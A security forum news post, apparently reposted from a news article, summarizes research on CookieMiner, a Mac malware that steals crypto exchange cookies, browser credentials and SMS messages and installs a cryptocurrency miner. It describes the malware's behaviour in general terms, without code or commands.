Discord Server Red Security Twitter Donation to Red Security Red Security Youtube Channel Red Security Tumblr Profile
Login or Register to Hide ads and Accessing all features on the forum
Thread Rating:
  • 3 Vote(s) - 1.33 Average
  • 1
  • 2
  • 3
  • 4
  • 5
News CookieMiner Malware Can Steal Crypto Exchange Cookies, Saved Passwords and iPhone SMS
[Image: hacker-keyhole-silhouette-illustration.jpg?imwidth=450]

    A new type of malware has been discovered, nicked-named 'CookieMiner' for its ability to steal cryptocurrency exchange cookies from the browser. Also included are is its ability to steal SMS messages, and financial and personal credentials from browsers. This has all been compiled by researchers, and it leads them to believe that this deadly new malware could let an attack bypass multi-factor authentication.  

  This malware is mostly a scare for Mac users. It does have the ability to download a base64-encoded Python script that is uses to retain a connection to the victim's computer. 

  How the malware starts its attack, is that it begins with a shell script in order to steal browser cookies, and sends a copy of them to a folder on a remote server. It then proceeds to target cookies associated with various crypto-exchanges. On top of all of this, it also installs a crypto-miner that utilizes the CPU [Not the GPU] in order to mine Koto, a Zcash based cryptocurrency. 

  The researchers also stated the following: 

  CookieMiner downloads a Python script named “harmlesslittlecode.py” to extract saved login credentials and credit card information from Chrome’s local data storage. CookieMiner adopts techniques from the Google Chromium project’s code for its decryption and extraction operations and abuses them.”

  Above all of this, the fact that the malware is able to use browser cookies, its speculated that it may be able to bypass certain login conditions on websites,  and hence, the website would never send an alert or notification that there had been suspicious logins by a user. 

  There has been no mode of entry that has been identified, but researchers involved in the matter stated that all users of a crypto wallet and/or exchange should keep a close eye on their wallets.

    Original article can be found here.

     That was  the news folks, have a good week, and stay safe out there.

01001001 00100000 01000001 01001101 00100000 01011010 01001111 01000100 01001001 01000001 01000011

Possibly Related Threads…
Thread Author Replies Views Last Post
Star News Top anti-virus, anti-malware products contain security flaws News 0 468 10-08-2020, 01:09 AM
Last Post: News
Star News Microsoft Exchange Server DlpUtils AddTenantDlpPolicy Remote Code Execution - CXSecu News 0 453 09-18-2020, 08:12 AM
Last Post: News
Smile News Critical Vulnerability In Bisq Crypto Exchange Exploited For Some Users Mr.Kurd 0 703 04-10-2020, 02:46 PM
Last Post: Mr.Kurd
Shocked News Dark_nexus botnet outstrips other malware with new, potent features Mr.Kurd 0 801 04-08-2020, 08:52 AM
Last Post: Mr.Kurd
Star News Microsoft Edge Now Alerts Users Of Breached Passwords Mr.Kurd 0 738 04-03-2020, 08:09 AM
Last Post: Mr.Kurd
Exclamation News Hackers Deliver LimeRAT Malware Using Password Protected Excel Spreadsheet’s Mr.Kurd 0 730 04-01-2020, 11:17 AM
Last Post: Mr.Kurd
Rainbow News Tekya Clicker Malware Hides in 56 Apps that Downloaded 1 Million Times on GooglePlay Mr.Kurd 0 659 03-27-2020, 11:47 AM
Last Post: Mr.Kurd
Question News New Android Cookie-Stealing Malware Found Hijacking Facebook Accounts Mr.Kurd 0 653 03-13-2020, 11:15 AM
Last Post: Mr.Kurd
Wink News Hackers Hijack Windows 10 RDP ActiveX Control To Download TrickBot Malware Mr.Kurd 0 695 03-01-2020, 03:32 PM
Last Post: Mr.Kurd
Wink News Raccoon malware affects all browsers Mr.Kurd 0 645 02-29-2020, 07:29 AM
Last Post: Mr.Kurd

Users browsing this thread: 1 Guest(s)